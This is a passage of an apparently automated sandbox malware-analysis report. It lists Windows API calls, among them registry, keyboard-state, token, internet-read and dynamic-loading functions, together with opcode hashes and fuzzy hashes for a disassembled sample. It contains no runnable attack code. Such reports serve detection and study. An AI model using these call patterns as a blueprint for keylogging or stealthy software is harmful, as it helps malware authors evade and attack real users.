                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 14734ba82d3ad271373613ab0bb1f53caf18d3b9692e00bc9a0710ef2ceea2b4
                                                                      • Instruction ID: 2a0bda04f36d05584dc42e0d61dca085e75f50209e13d4b95ff7e979add6e940
                                                                      • Opcode Fuzzy Hash: 14734ba82d3ad271373613ab0bb1f53caf18d3b9692e00bc9a0710ef2ceea2b4
                                                                      • Instruction Fuzzy Hash: 1351CA7190020DEFCB10EFA9DC81ABEB7BCFF85760B10466AE664D7191EB709E418B50
                                                                      APIs
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A2CF22,?), ref: 00A2DDFD
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A2CF22,?), ref: 00A2DE16
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00A2E473
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A2E4AC
                                                                      • _wcslen.LIBCMT ref: 00A2E5EB
                                                                      • _wcslen.LIBCMT ref: 00A2E603
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A2E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: cf46543e7f7df1314a81fd307eea1ac8d6c2e45fb7f6b5e9c2ae48a576cb2e31
                                                                      • Instruction ID: 6284f406860a0d4bdd729e4b786b271df765b6d827e35e7f15d885a09edb1228
                                                                      • Opcode Fuzzy Hash: cf46543e7f7df1314a81fd307eea1ac8d6c2e45fb7f6b5e9c2ae48a576cb2e31
                                                                      • Instruction Fuzzy Hash: 2F5164B24083955BC724EB94DC81EDF73ECAF84350F00492EF689D3192EF75A6888766
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4BAA5
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4BB00
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A4BB63
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00A4BBA6
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4BBB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 826366716-0
                                                                      • Opcode ID: cf9beff50abed0849179d4e0d0a3e702b18487a8f6bb1b0b3063a427a7676259
                                                                      • Instruction ID: 91c66523dd78391de401fa6f11f3ee0a77361fefa4e49ead357d3cb3368a4545
                                                                      • Opcode Fuzzy Hash: cf9beff50abed0849179d4e0d0a3e702b18487a8f6bb1b0b3063a427a7676259
                                                                      • Instruction Fuzzy Hash: 29617C35218241AFC314DF14C895F2ABBE5FF84358F14896CF4994B2A2DB31ED46CBA2
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00A28BCD
                                                                      • VariantClear.OLEAUT32 ref: 00A28C3E
                                                                      • VariantClear.OLEAUT32 ref: 00A28C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 00A28D10
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A28D3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: fd4e6872a7498d7879c8ea0c4743100545007c1ef93aed04ff3d1c827864e236
                                                                      • Instruction ID: 2ef3d06381e0ec1b57dd94be0806ad4ef28737230e21983c7231af584d707789
                                                                      • Opcode Fuzzy Hash: fd4e6872a7498d7879c8ea0c4743100545007c1ef93aed04ff3d1c827864e236
                                                                      • Instruction Fuzzy Hash: E4516AB5A01219EFDB10CF68D884AAAB7F8FF89310B158569F905DB354E734E911CB90
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A38BAE
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A38BDA
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A38C32
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A38C57
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A38C5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: 0b3918da8164eb7f465eadb1f10d0044a3f7a3c45848d9d9c778a1e6e95ae226
                                                                      • Instruction ID: 93690779c729204bdc11c7a8d57f688f90f2f72311b4387d5f6a1e1b7ebb4c68
                                                                      • Opcode Fuzzy Hash: 0b3918da8164eb7f465eadb1f10d0044a3f7a3c45848d9d9c778a1e6e95ae226
                                                                      • Instruction Fuzzy Hash: 3F513675A002159FCB00DF64C881EADBBF5BF88314F088059F849AB362CB35ED51CB91
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A48F40
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A48FD0
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A48FEC
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A49032
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A49052
                                                                        • Part of subcall function 009DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A31043,?,7735E610), ref: 009DF6E6
                                                                        • Part of subcall function 009DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A1FA64,00000000,00000000,?,?,00A31043,?,7735E610,?,00A1FA64), ref: 009DF70D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: 972b2eceefcdb4c4cfdb04fa76a578881720c83a8b5b5adaf9a0cf10241553ab
                                                                      • Instruction ID: b2d9c16977a7298313bb08ab2dc33a423fd174f6059d63e27477dc84fe2636dc
                                                                      • Opcode Fuzzy Hash: 972b2eceefcdb4c4cfdb04fa76a578881720c83a8b5b5adaf9a0cf10241553ab
                                                                      • Instruction Fuzzy Hash: 88513C39A00205DFC711DF58C495DAEBBF1FF89324B048199E8069B762DB31ED86CB91
                                                                      APIs
                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A56C33
                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00A56C4A
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A56C73
                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A3AB79,00000000,00000000), ref: 00A56C98
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A56CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _free
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 009D9141
                                                                      • ScreenToClient.USER32(00000000,?), ref: 009D915E
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 009D9183
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 009D919D
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00A338CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A33922
                                                                      • TranslateMessage.USER32(?), ref: 00A3394B
                                                                      • DispatchMessageW.USER32(?), ref: 00A33955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A33966
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00A3CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFF2
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00A21915
                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A219C1
                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00A219C9
                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A219DA
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A219E2
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A55745
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A5579D
                                                                      • _wcslen.LIBCMT ref: 00A557AF
                                                                      • _wcslen.LIBCMT ref: 00A557BA
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A55816
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00A40951
                                                                      • GetForegroundWindow.USER32 ref: 00A40968
                                                                      • GetDC.USER32(00000000), ref: 00A409A4
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00A409B0
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00A409E8
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 009FCDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009FCDE9
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009FCE0F
                                                                      • _free.LIBCMT ref: 009FCE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009FCE31
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                      • BeginPath.GDI32(?), ref: 009D96B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 009D98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 009D98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 009D98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 009D98F1
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      Similarity
                                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1860813098-0
                                                                      • Opcode ID: b1cc51f2d9b755c33fb33c281a585bcec0fbfa8f880cf83990b1d68850a1e892
                                                                      • Instruction ID: 71d55c456c673bd89aea936b5bfdfb2d0587010ec39902e5d71760fdc7d2a750
                                                                      • Opcode Fuzzy Hash: b1cc51f2d9b755c33fb33c281a585bcec0fbfa8f880cf83990b1d68850a1e892
                                                                      • Instruction Fuzzy Hash: 891138312853509FCB12DF64EC64FE93B34FF06766B04404BF5428B2A2CB314991CB50
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,009EF2DE,009F3863,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6), ref: 009F2DFD
                                                                      • _free.LIBCMT ref: 009F2E32
                                                                      • _free.LIBCMT ref: 009F2E59
                                                                      • SetLastError.KERNEL32(00000000,009C1129), ref: 009F2E66
                                                                      • SetLastError.KERNEL32(00000000,009C1129), ref: 009F2E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 8b466cbce3d101fa546740d91549318c3c0571f6b716124ea12ec8a38688d8c6
                                                                      • Instruction ID: ca7bc8dc73916f8c6f71bd1955becac5e2773d1a69f9565c10f4fe0155a5cbc7
                                                                      • Opcode Fuzzy Hash: 8b466cbce3d101fa546740d91549318c3c0571f6b716124ea12ec8a38688d8c6
                                                                      • Instruction Fuzzy Hash: F901F93224570C6BC61267B46C49F7B2A5DBBC17B57314525FB6597192EA748C024320
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?,?,00A2035E), ref: 00A2002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20054
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?), ref: 00A20064
                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: ae497c8a8f67d9b93cc85013afe564264a3b459bd65fa5d4ed99cb45f8629bde
                                                                      • Instruction ID: c241be6918a558443f9ed939db730794fb0b92a9871ec6337d62bdc54ead7584
                                                                      • Opcode Fuzzy Hash: ae497c8a8f67d9b93cc85013afe564264a3b459bd65fa5d4ed99cb45f8629bde
                                                                      • Instruction Fuzzy Hash: 10018B72600324BFEB108FACEC44FAA7AADEB447A2F144134F905D6225E771DD418BA0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A2E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00A2E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00A2E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A2E9B7
                                                                      • Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: de8407ed6980b2d84e3b5589eebfead668d1672c5dd5eedee2d2adfac540e8a9
                                                                      • Instruction ID: 2c0350bc327b8f73bbef4b24145c586dd8b8df7db650fed949b5fa1ad3da3301
                                                                      • Opcode Fuzzy Hash: de8407ed6980b2d84e3b5589eebfead668d1672c5dd5eedee2d2adfac540e8a9
                                                                      • Instruction Fuzzy Hash: CC010931C01639DBCF00EBE9ED59ADDFB78BB09711F000666E502B2245CB34959587A1
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 2594a7693ffa52ea4bccbfc5b67656e2c340a52f29fd7b0997393cc36e0ef6c7
                                                                      • Instruction ID: 6e515fb5424936b81d358cb18b40ee1ae936f1db338c2fca2d00907e7d0a9a00
                                                                      • Opcode Fuzzy Hash: 2594a7693ffa52ea4bccbfc5b67656e2c340a52f29fd7b0997393cc36e0ef6c7
                                                                      • Instruction Fuzzy Hash: FA016D75100315BFDB118FA8EC49A6A3F6EFF89375B100428FA41D7350DA31DC11CA60
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A20FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A20FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A20FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A20FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A21002
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 4905f64eabc9217c8ed275ff0dfcd0e7a83315d3e0a8bfb18bd9dd802a2b8dd1
                                                                      • Instruction ID: 4aee6cef52e97ffba69e3028a090a67321a89e2adae678af66082e45bad88e0b
                                                                      • Opcode Fuzzy Hash: 4905f64eabc9217c8ed275ff0dfcd0e7a83315d3e0a8bfb18bd9dd802a2b8dd1
                                                                      • Instruction Fuzzy Hash: 88F04935200315AFDB218FA9AC49F5A3BADFF89762F104424FA46C6291CA70DC818A60
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A2102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A21036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A2104C
